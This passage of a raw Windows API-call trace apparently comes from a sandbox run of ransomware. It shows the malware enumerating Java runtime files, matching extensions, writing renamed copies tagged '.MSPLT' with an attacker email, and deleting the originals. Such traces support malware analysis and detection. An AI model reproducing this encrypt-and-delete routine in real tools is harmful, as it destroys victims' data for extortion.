returned 5 [0300.671] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.671] lstrlenW (lpString=".pdf") returned 4 [0300.671] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".xls") returned 4 [0300.671] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".xlsx") returned 5 [0300.671] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.671] lstrlenW (lpString=".ppt") returned 4 [0300.671] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.671] lstrlenW (lpString=".zip") returned 4 [0300.671] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".rar") returned 4 [0300.671] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".bz2") returned 4 [0300.671] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".7z") returned 3 [0300.671] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.671] lstrlenW (lpString=".dbf") returned 4 [0300.671] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.671] lstrlenW (lpString=".1cd") returned 4 [0300.671] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.671] lstrlenW (lpString=".jpg") returned 4 [0300.671] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.671] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0300.672] lstrlenW (lpString="messages_zh_HK.properties") returned 25 [0300.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0300.673] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3752) returned 1 [0300.673] CloseHandle (hObject=0x440) returned 1 [0300.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties")) returned 0x20 [0300.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0300.674] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0300.674] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.674] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.674] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0300.675] GetLastError () returned 0x0 [0300.675] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xea8, lpOverlapped=0x0) returned 1 [0300.696] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xeb0, lpOverlapped=0x0) returned 1 [0300.697] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.698] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x106, lpOverlapped=0x0) returned 1 [0300.698] SetEndOfFile (hFile=0x46c) returned 1 [0300.698] CloseHandle (hObject=0x46c) returned 1 [0300.699] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.699] SetEndOfFile (hFile=0x440) returned 1 [0300.702] CloseHandle (hObject=0x440) returned 1 [0300.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.706] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties")) returned 1 [0300.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.707] lstrlenW (lpString=".doc") returned 4 [0300.707] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString=".docx") returned 5 [0300.707] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.707] lstrlenW (lpString=".pdf") returned 4 [0300.707] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString=".xls") returned 4 [0300.707] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString=".xlsx") returned 5 [0300.707] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.707] lstrlenW (lpString=".ppt") returned 4 [0300.707] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.707] lstrlenW (lpString=".zip") returned 4 [0300.707] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString=".rar") returned 4 [0300.707] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.707] lstrlenW (lpString=".bz2") returned 4 [0300.708] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.708] lstrlenW (lpString=".7z") returned 3 [0300.708] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.708] lstrlenW (lpString=".dbf") returned 4 [0300.708] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.708] lstrlenW (lpString=".1cd") returned 4 [0300.708] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.708] lstrlenW (lpString=".jpg") returned 4 [0300.708] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.708] lstrlenW (lpString=".doc") returned 4 [0300.708] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.708] lstrlenW (lpString=".docx") returned 5 [0300.708] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.709] lstrlenW (lpString=".pdf") returned 4 [0300.709] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString=".xls") returned 4 [0300.709] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString=".xlsx") returned 5 [0300.709] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.709] lstrlenW (lpString=".ppt") returned 4 [0300.709] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.709] lstrlenW (lpString=".zip") returned 4 [0300.709] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString=".rar") returned 4 [0300.709] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString=".bz2") returned 4 [0300.709] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.709] lstrlenW (lpString=".7z") returned 3 [0300.709] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.709] lstrlenW (lpString=".dbf") returned 4 [0300.710] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.710] lstrlenW (lpString=".1cd") returned 4 [0300.710] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 71 [0300.710] lstrlenW (lpString=".jpg") returned 4 [0300.710] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.710] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0300.710] lstrlenW (lpString="messages_zh_TW.properties") returned 25 [0300.710] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0300.711] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3752) returned 1 [0300.711] CloseHandle (hObject=0x440) returned 1 [0300.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties")) returned 0x20 [0300.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0300.711] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0300.712] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.712] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.712] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0300.713] GetLastError () returned 0x0 [0300.713] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xea8, lpOverlapped=0x0) returned 1 [0300.715] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xeb0, lpOverlapped=0x0) returned 1 [0300.716] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.717] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x106, lpOverlapped=0x0) returned 1 [0300.717] SetEndOfFile (hFile=0x46c) returned 1 [0300.717] CloseHandle (hObject=0x46c) returned 1 [0300.720] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.720] SetEndOfFile (hFile=0x440) returned 1 [0300.731] CloseHandle (hObject=0x440) returned 1 [0300.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.732] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties")) returned 1 [0300.733] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.733] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.733] lstrlenW (lpString=".doc") returned 4 [0300.733] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".docx") returned 5 [0300.733] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.733] lstrlenW (lpString=".pdf") returned 4 [0300.733] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".xls") returned 4 [0300.733] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".xlsx") returned 5 [0300.733] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.733] lstrlenW (lpString=".ppt") returned 4 [0300.733] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.733] lstrlenW (lpString=".zip") returned 4 [0300.733] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".rar") returned 4 [0300.733] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".bz2") returned 4 [0300.733] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString=".7z") returned 3 [0300.733] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.733] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.733] lstrlenW (lpString=".dbf") returned 4 [0300.733] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.733] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.734] lstrlenW (lpString=".1cd") returned 4 [0300.734] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.734] lstrlenW (lpString=".jpg") returned 4 [0300.734] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.734] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.734] lstrlenW (lpString=".doc") returned 4 [0300.734] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString=".docx") returned 5 [0300.734] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.734] lstrlenW (lpString=".pdf") returned 4 [0300.734] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString=".xls") returned 4 [0300.734] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString=".xlsx") returned 5 [0300.734] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.734] lstrlenW (lpString=".ppt") returned 4 [0300.734] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.734] lstrlenW (lpString=".zip") returned 4 [0300.734] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString=".rar") returned 4 [0300.734] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.734] lstrlenW (lpString=".bz2") returned 4 [0300.734] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.735] lstrlenW (lpString=".7z") returned 3 [0300.735] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.735] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.735] lstrlenW (lpString=".dbf") returned 4 [0300.735] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.735] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.735] lstrlenW (lpString=".1cd") returned 4 [0300.735] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.735] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 71 [0300.735] lstrlenW (lpString=".jpg") returned 4 [0300.735] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.735] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0300.735] lstrlenW (lpString="deploy.jar") returned 10 [0300.735] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0300.863] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=5040094) returned 1 [0300.863] CloseHandle (hObject=0x440) returned 1 [0300.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar")) returned 0x20 [0301.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.268] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0303.268] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.268] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.268] lstrlenW (lpString=".doc") returned 4 [0303.268] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.268] lstrlenW (lpString=".docx") returned 5 [0303.268] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0303.268] lstrlenW (lpString=".pdf") returned 4 [0303.268] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.268] lstrlenW (lpString=".xls") returned 4 [0303.268] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.268] lstrlenW (lpString=".xlsx") returned 5 [0303.268] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0303.268] lstrlenW (lpString=".ppt") returned 4 [0303.269] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString=".zip") returned 4 [0303.269] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.269] lstrlenW (lpString=".rar") returned 4 [0303.269] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.269] lstrlenW (lpString=".bz2") returned 4 [0303.269] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.269] lstrlenW (lpString=".7z") returned 3 [0303.269] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString=".dbf") returned 4 [0303.269] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString=".1cd") returned 4 [0303.269] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString=".jpg") returned 4 [0303.269] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.269] lstrlenW (lpString=".doc") returned 4 [0303.270] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.270] lstrlenW (lpString=".docx") returned 5 [0303.270] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0303.270] lstrlenW (lpString=".pdf") returned 4 [0303.270] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.270] lstrlenW (lpString=".xls") returned 4 [0303.270] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.270] lstrlenW (lpString=".xlsx") returned 5 [0303.270] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0303.270] lstrlenW (lpString=".ppt") returned 4 [0303.270] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.270] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.270] lstrlenW (lpString=".zip") returned 4 [0303.270] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.270] lstrlenW (lpString=".rar") returned 4 [0303.270] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.270] lstrlenW (lpString=".bz2") returned 4 [0303.270] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.270] lstrlenW (lpString=".7z") returned 3 [0303.271] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.271] lstrlenW (lpString=".dbf") returned 4 [0303.271] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.271] lstrlenW (lpString=".1cd") returned 4 [0303.271] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 49 [0303.271] lstrlenW (lpString=".jpg") returned 4 [0303.271] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.271] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.271] lstrlenW (lpString="dnsns.jar") returned 9 [0303.271] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.272] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=8286) returned 1 [0303.272] CloseHandle (hObject=0x4f0) returned 1 [0303.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar")) returned 0x20 [0303.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.273] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.273] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.273] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: 